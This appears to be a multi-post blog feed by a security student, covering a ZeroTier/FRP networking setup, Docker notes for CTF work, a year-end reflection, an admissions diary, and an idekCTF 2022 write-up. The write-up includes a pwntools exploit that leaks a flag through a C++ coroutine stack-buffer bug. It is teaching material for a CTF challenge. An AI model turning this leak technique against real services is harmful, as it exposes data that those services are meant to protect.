选一个距离 peers 比较近一点的机房，然后选多线机房（个人理解是同时接入多个运营商网络的机房），这样本机在任何运营商网络下都能有比较高的 p2p 打洞成功概率，这是我的隧道配置：

注意这里指定本机 IP 时一定要指定为局域网IP（即 192.168.0.0/16 等），而非回环IP（即127.0.0.1），符合条件的局域网 IP 范围如下图所示：

代码位置位于 InetAddress::ipScope 函数。

可能有人看到 172.16.0.0/12 也可以，因此就在 Zerotier 控制面板上给 moon 服务器/被穿透的服务额外增添了一个 172.16 打头的虚拟网 IP，之后把 Frpc 绑定到这样新添加的 172.16 打头IP上，以为也能达到要求。但经过本人实验是不行的，原因是 Zerotier 服务不会监听 Zerotier 自己虚拟网段下的 IP。

这里填写的本机IP，一定要是既符合上图网段要求，同时还被 Zerotier 监听 UDP 协议的 IP。

2. 原理

如果兴趣不大则可以跳过本节内容。

这是因为 isAddressValidForPath 函数只把四种类型的 IP 视为有效地址：

/**
  * Check whether this address is valid for a ZeroTier path
  *
  * This checks the address type and scope against address types and scopes
  * that we currently support for ZeroTier communication.
  *
  * @param a Address to check
  * @return True if address is good for ZeroTier path use
*/
static inline bool isAddressValidForPath(const InetAddress &a)
{
    if ((a.ss_family == AF_INET)||(a.ss_family == AF_INET6)) {
        switch(a.ipScope()) {
                /* Note: we don't do link-local at the moment. Unfortunately these
         * cause several issues. The first is that they usually require a
         * device qualifier, which we don't handle yet and can't portably
         * push in PUSH_DIRECT_PATHS. The second is that some OSes assign
         * these very ephemerally or otherwise strangely. So we'll use
         * private, pseudo-private, shared (e.g. carrier grade NAT), or
         * global IP addresses. */
            case InetAddress::IP_SCOPE_PRIVATE:
            case InetAddress::IP_SCOPE_PSEUDOPRIVATE:
            case InetAddress::IP_SCOPE_SHARED:
            case InetAddress::IP_SCOPE_GLOBAL:
                if (a.ss_family == AF_INET6) {
                    // TEMPORARY HACK: for now, we are going to blacklist he.net IPv6
                    // tunnels due to very spotty performance and low MTU issues over
                    // these IPv6 tunnel links.
                    const uint8_t *ipd = reinterpret_cast<const uint8_t *>(reinterpret_cast<const struct sockaddr_in6 *>(&a)->sin6_addr.s6_addr);
                    if ((ipd[0] == 0x20)&&(ipd[1] == 0x01)&&(ipd[2] == 0x04)&&(ipd[3] == 0x70)) {
                        return false;
                    }
                }
                return true;
            default:
                return false;
        }
    }
    return false;
}

这其中包括了 IP_SCOPE_PRIVATE 局域网地址和 IP_SCOPE_GLOBAL 公网地址，但并不包括 IP_SCOPE_LOOPBACK 回环地址。

Zerotier 在接收到 UDP 数据包后会获取包中的目的 IP，进而判断该数据包是否合法。这个逻辑比较容易理解，只要知道对方朝的是自己哪个 IP 地址发包，就能得知哪个网卡可以 p2p 打洞。

但倘若 FRP 绑定的是本机的 127.0.0.1，那么即便其他 peer 能通过 FRP 发包到 udp://127.0.0.1:9993，Zerotier 也会丢弃接收到的 UDP 数据，造成 p2p 失败。

三、Frpc 测试

在创建好隧道并且也在远程 moon 节点所在机器上也连接好 Frpc 隧道后，接下来需要测试一下 host 和 moon 之间的 UDP 收发能力。

这一步非常重要，因为 UDP 协议的特殊性，很多网络都会对 UDP 数据包有着严苛的过滤条件。

例如本人在学校校园网中就无法成功收发 UDP 数据包。

测试步骤很简单：

修改 moon 机器上 frpc 待转发的端口，从 9993 修改为 9992，之后重新启动 frpc，此时穿透的 UDP 数据应该会发送至本机 9992 端口处。
这一步可以通过直接修改 frpc.ini 或者在网页面板上修改并重新拉取配置文件来完成。
9992端口没有什么特殊性，可以随便改成一个自己记得住的端口；这里修改端口是因为 9993 端口已经被 Zerotier 服务占用了，一个端口无法同时被多个 UDP 监听。

在 moon 机器上启动 UDP-EchoServer 服务，以下是我用来测试的 python 代码：

# python3 /tmp/udp-echoserver.py 192.168.XX.XX 9992

import sys
import socket

def udp_echo_server(host, port):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server_socket.bind((host, port))
    print(f"UDP Echo server started on {host}:{port}")
    while True:
       data, addr = server_socket.recvfrom(1024)
       print(f"Received data from {addr}: {len(data)}")
       server_socket.sendto(b"server: " + data, addr)

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python udp_echo_server.py  ")
        sys.exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    udp_echo_server(host, port)

host 上运行 nc -u 向 Frpc 中转服务器发送 UDP 数据包，查看发送的数据包能否被转发回来。

测试效果如下，图中上面两个窗口是 moon 服务器的 shell，最下方窗口是 host 的 shell。host 使用 nc -u 并在交互式界面中输入数据并按下 enter 键发送。该 UDP 数据包将被发送至 Frpc 中转服务器并穿透至 moon 的 udp://192.168.x.x:9992，随后 9992 端口上的 echo server 就会把该数据包原样返回。只要 host 能在发送 UDP 数据包后原封不动的接收到 UDP 数据，即可证明双方 UDP 收发功能正常。

这一步可能会有一定概率失败，失败的原因主要有两个（都是本人遇到过的）：

Frpc 公网中转服务器所分配的端口号过大，例如分配了 50000+ 的端口号。过大的 UDP 端口号可能会被路由策略过滤，只能重新申请分配新的 UDP 隧道或者更换中转服务器节点，来降低所分配的 UDP 端口号。
本人测试 UDP 端口号 < 30000 基本上没有出现过问题。
复杂或受限网络可能会限制 UDP 数据包的收发，例如校园网。本人连接校园网后实测无法收发 UDP 数据包，但切换为手机热点就可以通过 UDP 测试。

如果想测试 9993 端口的收信功能则可以使用命令：sudo tshark -i any udp port 9993 and src host 192.168.x.x
UDP测试完成后记得把隧道端口号改回 9993。

四、Zerotier Moon 搭建

关于 Zerotier Moon 搭建网上教程是非常多的，基本上都是大同小异。可以参考这个搭建ZeroTier的Moon服务器小记 - dengzile

Moon 服务器：

# 0. 切换工作目录
cd /var/lib/zerotier-one

# 1. 创建基础 moon 文件
sudo zerotier-idtool initmoon identity.public > moon.json

# 2. 此处需要修改 moon.json 中 stableEndpoints 为 Frpc 分配的公网IP和端口
# （注意该隧道需要映射至 moon 的 9993 端口）

# 3. 给 moon.json 文件签名，生成 moon 文件
sudo zerotier-idtool genmoon moon.json

# 4. 将签名好的 moon 文件移动至 moons.d 文件夹下
mkdir moons.d
mv 000000*.moon moons.d

# 5. 重启 zerotier-one 服务
sudo service zerotier-one restart

# 6. 此时可以罗列出当前的 moons 信息
sudo zerotier-cli listmoons

windows （本机），使用管理员权限打开 cmd：

# 0. 切换工作目录
C:\Users\Kiprey>cd C:\ProgramData\ZeroTier\One

# 1. 创建 moons.d 文件夹并切换
C:\ProgramData\ZeroTier\One>mkdir moons.d
C:\ProgramData\ZeroTier\One>cd moons.d

# 2. 拷贝远程 moon 节点上的 moon 文件，由于此时 moon 还没配置好，因此这种数据下载实际上是通过 UDP 中继完成。
C:\ProgramData\ZeroTier\One\moons.d>scp kiprey@172.24.0.133:/var/lib/zerotier-one/moons.d/000000xxxxxxxxxx.moon .
000000xxxxxxxxxx.moon                        100%  259     0.5KB/s   00:00

# 3. 重启服务
# 键入 win + R 启动 "运行" 窗口 -> services.msc -> 找到 Zerotier-One 服务并重启

这种下发 moon 文件的操作应该是可以通过 zerotier-cli orbit 命令来实现，但本人在实际测试的是否发现 orbit 可能会失败，即没能成功下发 moon 文件，不太清楚是哪里有问题，因此最终还是手动下载了一下。
不过这个问题并不重要，只是随口提起。

重启本机 Zerotier 服务后再运行 zerotier-cli peers，可以发现 Moon 节点以及和 Moon 相近的节点全部从 RELAY 中继变成了 DIRECT 直连：

配置 moon 前：
sshping 延迟平均高达 300ms，操作 ssh 一卡一卡的。
配置 moon 后：
sshping 的延迟降低到了 100ms 左右，ssh 操作明显的流畅起来了。

idekCTF2022 - Coroutine Writeup

2023-01-20T16:00:00.000Z

Introduction

Last weekend I participated in idekCTF 2022 with r3kapig. After briefly browsing other pwn challenges, I tried to solve Coroutine and finally solved it (4 sovled in total).

Now, let’s dive into this challenge!

C++20 Coroutine

What’s the coroutine ?

A coroutine is a function that can suspend execution to be resumed later. Coroutines are stackless: they suspend execution by returning to the caller and the data that is required to resume execution is stored separately from the stack. This allows for sequential code that executes asynchronously (e.g. to handle non-blocking I/O without explicit callbacks), and also supports algorithms on lazy-computed infinite sequences and other uses.
ref: Coroutines (C++20) - cppreference

As we have seen, coroutines are executed in a single-threaded environment, and can be paused as needed during execution (e.g. waiting response from peers) and finally find a suitable time to resume execution (e.g. receive the reply from a peer).

What does this mean?

The execution environment may be different before and after the co_await statement. (e.g. current thread id)
If the coroutine holds a outer pointer or reference, this may cause memory problem (e.g. UAF、 UAP…)

Program Logic

User can interact with proxy to change the proxy receive buffer size and send buffer size. Interestingly, we can also find that the size of the program’s send buffer is manually set to 128 byte. These indications suggest that the vulnerability is most likely related to the socket buffer size.

1 2	int sendbuff = 128; setsockopt(accept_result, SOL_SOCKET, SO_SNDBUF, &sendbuff, sizeof(sendbuff));

After reading the source code carefully, we can know that the program is act as echo server, reading the messages from proxy and send back:

create and execute the coroutine. In the coroutine, program will accept client connection and run into client_loop to repeatedly receive and send messages from client.

If program cannot receive the message from client (e.g. there is currently no data from the client), or cannot send the message to client (e.g. socket buffer is full), the coroutine will save its own coroutine-handler and suspend its own execution, returning to the caller:

class RecvAsync(SendAsync) : NonCopyable {
public:
    ...
    auto operator co_await() {
        struct Awaiter {
            ...

            bool await_ready() {
                ...
            }
            void await_suspend(std::coroutine_handle<> handle) noexcept {
                // save current coroutine handle 
                ctx_.add_read(fd_, std::move(handle));
            }
            int await_resume() {
                ...
            }
        };
        return Awaiter{ ctx_, fd_, buffer_ };
    }
    ...
};

The program will run into io_content::run_until_done，monitor the file descriptors with select， and resume the execution of corresponding coroutine if any file descriptors are available.

Interestingly, in the loop of run_until_done, the program will execute load_flag to load the flag into the stack.

void load_flag()
{
    char flag[400];
    FILE* fp = fopen("flag", "rt");
    fscanf(fp, "%s", flag);
    fclose(fp);
}

void run_until_done()
{
    while (!reads_.empty() || !writes_.empty())
    {
        load_flag();
        ...
    }
}

Vulnerability

I was interested in how the coroutine captures the context, so I modified the code and printed out the addresses of all the buffers. Here are some code snippets.

Task<bool> client_loop(io_context& ctx, int socket)
{
    while (true)
    {
        std::byte buffer[512];
        printf("client_loop buffer before RecvAsync: %p\n", buffer);
        int recved = co_await RecvAsync(ctx, socket, buffer);
        ...
    }
}

Output: client_loop buffer before RecvAsync: 0x5603212fff89

This output indicates that the buffers in the coroutine will be created in the heap. In other words, this entire coroutine function is actually equivalent to a heap structure. This is the reason why a coroutine can suspend and resume execution at different times, because it preserves the context when it is created.

However, after carefully checking each buffer’s address, I found that the coroutine did not capture the buffer2 in function SendAllAsyncNewline. In other words, the address of buffer2 is located on the stack, which is not far from the memory location storing the flag (< 512 byte, 0x200).

void load_flag()
{
    char flag[400];
    printf("load_flag: %p\n", flag);
    FILE* fp = fopen("flag", "rt");
    fscanf(fp, "%s", flag);
    fclose(fp);
}

Task<bool> SendAllAsyncNewline(io_context& ctx, int socket, std::span buffer)
{
    std::byte buffer2[513];
    printf("SendAllAsyncNewline buffer: %p\n", buffer.data());
    printf("SendAllAsyncNewline buffer2: %p\n", buffer2);
    std::copy(buffer.begin(), buffer.end(), buffer2);
    buffer2[buffer.size()] = (std::byte)'\n';
    return SendAllAsync(ctx, socket, std::span(buffer2, buffer.size()+1));
}

Output:
SendAllAsyncNewline buffer: 0x559806712f89
SendAllAsyncNewline buffer2: 0x7ffc1ddfd3a0
load_flag: 0x7ffc1ddfd480

And SendAllAsync will also send data multiple times:

Task<bool> SendAllAsync(io_context& ctx, int socket, std::span buffer)
{
    int offset = 0;
    while (offset < buffer.size())
    {
        int result = co_await SendAsync(ctx, socket, std::span(buffer.data() + offset, buffer.size() - offset));
        if (result == -1)
        {
            co_return false;
        }

        offset += result;
    }
    co_return true;
}

If we can carefully interact with proxy, we can leak the flag by the following process:

During the two SendAsync execution intervals in SendAllAsync, returning the control flow to run_until_done by filling the socket buffer in advance.
Executing load_flag function to load the flag into stack memory, which happens to overlap with buffer2 .
Clean the proxy receive buffer, so that the program can continue to send buffer2 to the client. Since we have loaded the flag into buffer2 before sending, the flag will be output along with it.

Exploit

Once you have found the threshold for sending data length in docker, all the difficulties in challenge are solved.

Note: you can find the sending threshold more easier by modifying the source code, as you wish.

# -*- coding: utf-8 -*-
from pwn import *

# io = remote("coroutine.chal.idek.team", 1337)
io = process("python3 proxy.py", shell=True)

context(terminal=['gnome-terminal', '-x', 'bash', '-c'], os='linux', arch='amd64')
context.log_level = 'info'

# Change Receive Buffer
io.sendlineafter("Select Option:", b"2")
# Change Receive Buffer size to the minimal size
io.sendlineafter("Buffer size> ", b"1")

# Connect
io.sendlineafter("Select Option:", b"1")


# Filling the proxy recevie buffer and remote send buffer.
send_size = 5 * 512 + 314 # 0xb3a
while send_size > 0:
    current_send_size = min(512, send_size)
    send_size -= current_send_size
    
    io.sendlineafter("Select Option:", b"4")
    io.sendlineafter("Data>", b"a" * current_send_size)
    
# As proxy recevie buffer and remote send buffer are filled
# The `SendAllAsync` will be suspend and run `load_flag`
io.sendlineafter("Select Option:", b"4")
io.sendlineafter("Data>", b"a" * 512)

# Read the receive buffer, and `SendAllAsync` will be resume to send the flag.
for _ in range(6):
    print(io.sendlineafter("Select Option:", b"5"))
    print(io.sendlineafter("Size>", b'4096'))

You can read the flag idek{exploiting_coroutines} in the proxy receive data.

In fact, I did not write any python script for exploit when solving this challenge. Instead, I was interacting directly with the remote server using nc. So I wrote the above exploit script based on previous interaction logs.

Reference

CTF Docker 小记

2023-01-07T16:00:00.000Z

简介

每次玩玩 CTF 时总是会因为 Docker 速度慢、忘记命令等等使自己非常抗拒启 Docker 环境，但是没有 Docker 环境实操题目就又成了纸上谈兵。

因此趁着 RealworldCTF 5th 来熟悉并记录一下 Docker 的使用，感兴趣的 pwn 手可以一起实操一下 docker。

Docker 管理命令

docker image list --all ：查看各种 image

➜ docker image list                        
REPOSITORY   TAG        IMAGE ID       CREATED         SIZE
            cc3193e40804   8 minutes ago   121MB
            fd184cbecbe0   3 months ago    72.8MB
ubuntu       20.04      a0ce5a295b63   4 months ago    72.8MB
python       3.6-slim   c1e40b69532f   12 months ago   119MB
ubuntu       14.04      13b66b487594   21 months ago   197MB

docker image rm ：删除特定 image

docker container list --all ：查看当前所有容器。
和 docker ps -a 等价。
docker container rm ：删除容器
和 docker rm 等价。
docker build -t .：构建当前目录下 Dockerfile 的 image，并将该 image 命名为
docker run [cmd]：从 image 构建出新的容器，并执行 cmd （如果有）。
docker start -i ：在交互模式下启动容器。
docker stop ：停止当前正在运行的容器。
docker save -o ：导出 image 至文件路径处
docker load -i ：导入外部 image 文件至 docker 中。通常这两步导入导出和 docker tar 有关。
docker exec -it ：在某个正在运行的容器中执行命令
在非运行状态下容器执行命令则需要先用 docker start 启动容器再去执行 docker exec

Dockerfile 相关

Docker 换源

sudo nano /etc/docker/daemon.json

写入以下内容

{
    "registry-mirrors": [
        "https://yxzrazem.mirror.aliyuncs.com",
        "http://hub-mirror.c.163.com",
        "https://registry.docker-cn.com",
        "http://hub-mirror.c.163.com",
        "https://docker.mirrors.ustc.edu.cn"
    ]
}

上面那个奇怪的阿里云镜像地址是 阿里云镜像加速器专属地址。这里我直接抄了别人的，反正还有其他几个源，这个不行其他还能继续用。

重启 docker 服务
1
sudo service docker restart
注：如果宿主机能连接网络但是 docker 无法连接，则重启docker服务就能解决该问题。

Dockerfile 替换 apt 源

默认 apt 源的下载速度非常感人，因此需要额外添加几句来替换默认 apt 源。

RUN cat /etc/apt/sources.list
RUN sed -i s@/archive.ubuntu.com/@/mirrors.aliyun.com/@g /etc/apt/sources.list \
   && sed -i s@/deb.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources.list \
   && sed -i s@/security.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources.list \
   && sed -i s@/security.ubuntu.com/@/mirrors.aliyun.com/@g /etc/apt/sources.list \
   && apt-get clean

Dockerfile 替换 pip 源

在 Dockerfile 中添加以下代码：

1
2
3

RUN mkdir ~/.pip && \
    cd ~/.pip/  && \
    echo "[global] \ntrusted-host =  pypi.douban.com \nindex-url = http://pypi.douban.com/simple" >  pip.conf

Dockerfile 网络加速
- github 加速：可以使用 GitHub 文件加速网站来生成加速后的 github 文件下载链接。
- Docker 配置代理：可以参考这个 Docker 配置网络代理 - CSDN
Dockerfile 构建 image
在 Dockerfile 所在文件夹下，运行 docker build -t chal . 以构建 docker 实例。
这里指定了构建好后的 image 名称为 chal，便于后面启动实例时指定名称，而不用再去查找 image id。

构建 Docker 容器并启动

# -i 交互模式
# -t 分配伪终端
# -name 指定所启动 container 的名称
# -d 后台运行容器，通常这个选项我们几乎用不到(detach 分离模式)
# –privileged=true 提升系统执行权限
# -p 宿主机端口:容器端口  端口映射
# -v 本地路径：容器路径 路径映射
docker run -name  -it  [cmd]

例如

1	docker run -it --name paddle_chal_container paddle_chal:latest

如果 docker run 末尾不额外携带运行的命令，并且 Dockerfile 中带有 CMD 命令（例如 CMD ["python", "web_service.py"]），则 docker run 将会自动运行该命令。

注意，最好不要通过在 Dockerfile 末尾添加 CMD ["/bin/bash"] 来启动终端，因为这样启动的终端退格键将被转义无法使用。

当通过 docker run 成功构建并启动容器后，该命令将不可再被二次执行（因为该命令包含了构建容器这一步，而现在容器已经构建好了），后面想再启动所构建好的容器，则需要执行 docker start -i 。

可以参考 docker run - 菜鸟教程查看更多参数信息。

Dockerfile 格式

如果有小小伙伴想自制 Dockerfile 则需要了解一下其中的各个命令。

这里直接参考这个 Dockerfile格式以及Dockerfile示例 - 阿里云开发者社区，非常全面，我就不再贴了。

CTF 调试

CTF 调试最重要的无非两步，调试器和编辑器。

先启动一下 docker 容器：

# 启动容器。这里没有指定 -i 交互模式，因此容器将进入后台运行
docker start 
# 在已运行容器中启动 bash
docker exec -i  /bin/bash

bash 执行成功后不会有任何提示，需要自行输入 whoami 等命令来测试是否已经成功。

不要使用 ls 来测试，因为可能当前文件夹下没有文件，误导人判断错误。

调试器配置

首先是调试器，这里直接在 docker 中执行安装 pwndbg 的过程即可，无需将这个安装过程写到 dockerfile 中：

# 此时是 root 权限，因此无需 sudo
apt-get update
apt-get install git

cd ~
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

# 安装 pwntools
pip3 install pwntools

编辑器配置

这里首选 VSCode，VSCode 中包含了丰富的 Docker 插件可用于管理与处理容器。

参照 VsCode在Docker中进行开发 - 知乎，在 VSCode 中安装 Docker 和 Dev Containers。

安装好后即可直接通过宿主机的 VSCode 来附加至 Docker 容器中：

2022年年终总结

2023-01-04T16:00:00.000Z

2022 年年终总结

2021.11.29

在阅读论文的这段过程里，我慢慢对安全研究有了更深层次的体会。之前一个老师和我说，“挖洞不是安全研究，研究研究，研究的对象应该是一个有规律的东西，例如数学物理等”，当时的我尚未明白。直到现在，我们慢慢了解了，其实安全研究，本质上是研究某些东西或某些领域如何做的更好，达到更好的效果，例如 fuzz 出更好的覆盖率或者提出更好的防护手段。

而挖洞，与其说是研究，更不如说是在现有安全研究的成果之上，所进行的一种行为。例如 e9afl 基于 e9patch 这一个安全研究的产出，对闭源产品进行插桩 fuzz，完全达到开源代码插桩 fuzz 的效果。

这样看来，安全研究确实是有规律的，比如这周刚刚看完的 healer（一个 kernel fuzz）。

现有问题：生成的 syscall 序列覆盖率不够高
提出想法：尝试获取 syscall 之间的显式关系和（最重要的）隐式关系，以提高覆盖率
实现方法：分析 syzlang 获取显式关系，通过覆盖率反馈和覆盖率变化检测来获取隐式关系。

这样一条 提出问题->解决方法->实现过程的链就这么串起来了。

实际上，个人认为安全研究和挖洞应该是相互包容的关系，不可分割。企业中安全研究的这个职业，我们通常指的是挖洞选手。而要想挖出别人没挖到的二进制漏洞，那就必须深扎安全研究，将某个新颖想法从提出变成实现。而安全研究也常常需要**几十个 CVE或挖到了更难挖出的洞（或别人挖不出的洞）**来证明某个成果的成功性，现有的漏洞猎人也是站在当前安全研究的进度上进行漏洞挖掘，例如 Address Sanitizer 这个相当优秀的内存检测工具，在现在的二进制挖洞环境下，处处都有它的影子。而它也曾是通过安全研究所提出来的一种简单想法，并最终逐步发展成一个非常完备的工具。

我曾在读研深造和直接就业这二者间徘徊过，不过随着暑期玄武的这段经历以及后续我阅读论文慢慢产生的一点想法来看，我已经逐渐坚定了自己读研的方向，想再潜心搞搞三年安全研究，尤其是漏洞挖掘与防护。个人认为读研不能为了读研而读研，没有目的的读研其实没有什么意思，而且很容易荒废掉自己的时间。在确定了自己的目的与方向后，我相信未来的研究将会充满着乐趣，因为研究自己感兴趣的东西是真的很容易上瘾（兴趣驱动型）。

不过虽然我站在现在的角度上理这一整套想法，可能还是存在着较大的局限性，但是我还是想把这段话留在这里，也算作一个标志。在未来的某个阶段我再回头看看当时的想法，说不定又有什么全新的体会。

2022年终总结

第一次写年终总结，有点不知道咋写，搓手手，就按照流水账的形式想到啥写啥吧。

上面这段是我在2021年年底有感而发写下的内容，可能有些水话或者自己也说不太清楚道理的语句（笑），随便看看。当时的我也曾在就业和升学中徘徊，之前想升学主要是有保研名额，不升学白不升；后来也在腾讯实习期间动摇过是否就业也是种选择。2021年年底从腾讯回来后紧接着就是准备搞科研（大三上学期），当时搞科研也是稀里糊涂，纯粹是因为大家都搞了所以就跟着大流联系老师搞，因此大三上学期的校内科研精力其实没有太多激情，感觉自己也不知道在搞什么（老师可能也比较头疼怎么安排任务hhh）。但这段时间确确实实让我有了更进一步阅读论文的契机，让我开始慢慢习惯阅读论文。回想起大二寒假第一次实习时，单单精读一篇论文汇报就花了有半个月的时间，现在确实小有进展。

后来2021年11月底，我准备了半个月的文书，读了一些论文，申请了清华网研院的科研实习。当初也因为很多原因踌躇过，犹豫过，但最后还是一句“不试试怎么知道呢”，投递出了实习申请。那段时间为了一篇文书、一份简历找了很多老师同学等寻求修改意见，也读了心仪导师相关工作的几篇论文，写了笔记，只为能让邮件中*“对老师目前的研究有了进一步了解”*这句话尽可能的真实。不过幸好，结果是好的，我成功申请进入 NISL 参与实习。（这里需要感谢一下我的神仙导师）

2022年上半年的时间基本上都花在了课程任务与科研实习上。这半年时间过得还算惬意，上完课回来就帮帮学姐做做实验，要是空闲的话打打 CTF ，研究一手新技术，或者看看论文啥的，还在学姐的鼓励下在 NISL 公开学术沙龙中做了一次论文分享。不过令我感到惊讶的是，因为我博客一直都在维护，5月份时我收到了华为 HR 的实习邀请、清华 ucore 作者的邮件联络；9月份时收到了上交 GOSSIP 组的实习邀请，以及10月份Water Paddler国际CTF战队的邀约。这些都是我曾经从未经历过的，惊奇之余也激励着我继续向前。

下半年的时间主要聚焦在保研流程中。准备材料、投递夏令营、准备洛谷机试等等，具体细节不一一做表。保研的这几个月也是折腾了很久，最麻烦的就是填写每份材料并投递出去，同时也要多发邮件联系老师寻求机会。不过索性结果还算顺利，虽然机考炸了只吃了个低保分，但硕士排名位于15/20 还是成功保研去清华网研院攻读硕士。结果出来的那一刻心里古井无波，已经没有了悲喜，只是感慨保研终于结束了。女朋友也保研去了北航，和清华仅仅隔着一条街，硕士入学后买辆小电驴就可以经常快乐相见了。

这一年主要面对着对保研的迷茫与压力。接下来，当决定了未来三年的去向、决定了自己接下来的研究方向后，后面的旅途也变得不再迷茫。但压力也确实是有的，来自多个方向的压力推着我，让我如履薄冰，不敢停下。保研结束后我也感受到自己的精力不再像是前两年那么充沛，这之中可能有心态的变化，但我更觉得跟长期熬夜导致的身体条件有关。年轻人要多锻炼少熬夜，只叹自己虽知但不容易做到。

长风破浪会有时,直挂云帆济沧海。2023年是新的一年，希望自己可以在新的一年中将自己的科研工作做到更好，同时也挖到更多的洞，在安全这条路上走得更远。

共勉。

2022年信息安全专业保研历程

2022-11-13T16:00:00.000Z

一、简介

这里记录着本人 2022 年秋季保研求学的经历。

考虑到各个院校的保密需求，这篇经验帖在推免生填报系统关闭后的一段时间发布。

二、个人情况

学校：末流985
专业：信息安全
GPA: 3.79/4.00
排名：1/42
奖项：一些校级和省级奖项，一个国三水奖；有国励，无国家奖学金。
本专业每年只有一个国奖，年年国奖不是同一个人，年年国奖第二名都是我。本科永远的痛 T_T
实习经历
- 大二寒假：长沙本地静态分析研发
- 大二暑假：腾讯安全玄武实验室
科研经历：大三年大半年的清华网研院实习。实习期间主要参与对比试验的进行、部分论文的撰写以及另一个项目的代码编写。
论文：清华实习期间混了篇 Usenix Security 2023（安全国际四大顶会之一）在投论文三作。
项目：无科研项目，有一个产出较多的 Fuzzer，挖掘到诸多知名厂商的漏洞，获得过漏洞致谢和较丰厚的漏洞赏金。
科研兴趣：软件与操作系统安全
目标：华五往上学硕。
不考虑专硕，几万几万的学费掏不出来（本科每年 8k 学费都要死要活的，几 w 学费怕不是要砸锅卖铁）
不考虑直博，直博目前没有想法，不能为了冲院校而直博，这个得慎之又慎。

粗体标注了一些个人认为略微可以算是重点的东西。

最终去向：清华大学网络科学与网络空间研究院。

三、夏令营

1. 整体情况

院系	入营情况	备注
北大计算机	没入	材料晚了一天提交，没交上（绝了）
北大软微	入营
北大信工	没入	可能要联系导师
清华深圳研究院	没入	可能要联系导师
清华网研院	没入	优先进直博，至于硕士可能是冲的人太多了，院校 title 不好被筛掉了
复旦计算机	入营	纯纯的只按照院校 title 和 rank 筛，入营送衣服和本子
国防科大	/	报了就没再管了
哈工深	没入	今年 bar 感觉格外的高
华科计算机	没入	bar 高
南大计院	入营	听说 1k 人的大海营
南大软院	入营（放弃）	时间和南大计院冲了
人大信科	入营	筛人不纯粹按照 title 和 rank，而是会结合自身经历等等来筛，非常的有意思。
上交软院	入营
武大网安	入营
中科大网安	入营	听说 985 bar 低稳进，入营送大礼包（但是后期鸽掉中科大夏令营则得为大礼包付费）
中科院计算所	入营	入了但退出面试
中科院信工所	半入营（放弃）	入了但是感觉没筛人，而且学校放假材料要盖章，同时也入了一些不错的学校，就没再管了

总结：

华五的学校基本都入了（人大、南大、复旦、上交、中科大）
清北除了北大软微以外，都没让我入…

还是太菜了…

2. 具体情况

整个夏令营高峰期差不多是两周左右，以下按面试时间排序。

a. 复旦计算机

入营

复旦入营是纯纯的卡 title 和 rank，只要 title 好 rank 够就直接放你进去，实习经历科研经历论文啥的在入营阶段是一点也不看。

入营的营员都会发一件文化衫和一个复旦的本子，比较友好。

不友好的是发的文化衫我穿不下（就不能先统计一下吗，捂脸）

复旦今年入 300 人，但是可能只招收 50 个左右，最大头的招生部分还是留在了预推免。

时间表

7.1 上午：复旦模拟面试
7.4 上午：复旦开幕式
7.5：上午复旦机试，下午复旦英语面试
7.6 上午：复旦专业面试

复旦大学的时间貌似一直都是这样摊的比较开，不过幸好它比较早开营，没怎么和其他学校撞上。

开幕式

复旦入营就会寄一件文化衫 + 本子。开幕式的时候要求全体营员身穿文化衫，一批一批集体合照，但问题是…

复旦没有统计身高啥的，发的文化衫是面向 175 cm 的，对我一个快到 190 的壮汉属实是不太能套的进（捂脸）
腾讯会议对同时打开的摄像头数量貌似有限制，有不少同学在开幕式要打开摄像头合照的时候，被腾讯会议拦截摄像头打开请求，要求再等一段时间再打开…（包括我）
合影的时候，有好几个同学的腾讯会议背景还是清华网研院的图片（清华网研院比复旦早开幕，估计是网研院那边有要求要换背景），合影时属实有点尴尬（笑）

机试

复旦的机试一直都和其他学校不太一样，2小时3道题，自己编测试样例然后测试，提交时把自己写的题解（包括解题思路、时间复杂度、自己编写的测试样例等等）和代码打包交上去。提供的 OJ 只能反馈是否 Compile Error 或者 Submit，其他的都无法反馈。

第一题我用的图拓扑排序，第二题要用单调栈+线段树，第三题有点类似与背包问题，应该要用 DP。当时只做出来了第一题，第二题卡太久时间结果愣是没做出来。

英语面试

英语面试的问题和自己的自我介绍高度相关，貌似英语面的时候那边没有考生的材料，有点奇怪。面试的时候是一个老师以及一个有点像是研究生的学姐在面，整个过程一直都是学姐提问，老师没问问题。

自我介绍里提了一句辅助完成论文的编写，后面的英语问答全部都是问这方面的（捂脸）。例如问了:

写的论文哪部分
你是如何写的 Related work，可以分享一下经验吗
Fuzzing 的背景

等等，答得也只能说一般般，先前准备的英语模板问题根本没用上。

专业面试

专业面试是五个老师面，每个老师都会问问题。问的问题主要围绕我的腾讯实习经历、fuzzer 工具、408、机考题等等，总体还是围绕自我介绍。

这里要插一句了，看上去面试的老师好像真的没有考生的相关材料，感觉有点奇怪。

408 主要问的我操作系统缺页中断相关的内容，以及 http 和 https 的差别，还有 https 在什么情况下会被中间人攻击等。

机考题问了我第二题怎么做。机考题应该是必问项，有的同学会被问第三题有的会被问第二题，因此即便当时机考时做不出来也要事后立即求助他人去了解剩余不会做的题目的做法。

老师会专门问一下有没有科研项目，我那个 Fuzzer 不能算是科研，但是我也只能把它捞出来说了。边上有个老师提问这个工具挖到的漏洞有没有漏洞证明啥的，我说有，拿到了几个 CVE 编号和漏洞赏金。还问了一下这个是怎么检测到漏洞的，我就把 Address Sanitizer 搬出来简单扯了两句。

整体上答得还行。

结果

寄了，连 waiting list 都没有呜呜。后来仔细想了一下应该有几种原因：

竞争压力有点大。我报的是 ym 老师的智能系统组，学硕大概 15 进 2，而且这个组好像没有弄 waiting list。
没联系导师。不过这个可能性有点小，因为入营便立刻联系老师的学生同样有没进的。
方向不大对头。我本科阶段做的一直是和模糊测试有关，但他们那边主要做的还是软件代码分析这一块，模糊测试貌似不怎么做。

仔细想想还是第三个原因可能性更大一点，因为面试的时候好像那些老师对我的内容不太感兴趣，一度出现了没什么老师想问问题的沉默尴尬局面。

b. 人大信院

入营

人大信院是最早开放夏令营报名的（5月20日截至），因此被冲烂了，报的人太多。先前说六月中旬出结果，结果六月中旬了之后还没出来，通知最上方的是一个叫做王老吉奖学金推荐情况公示的通知。因此很多绿群群友就戏称人大信院为王老吉。

这个王老吉公示的浏览量我是看着他从 200 变成现在的 8k+ 的，被冲烂了已经…

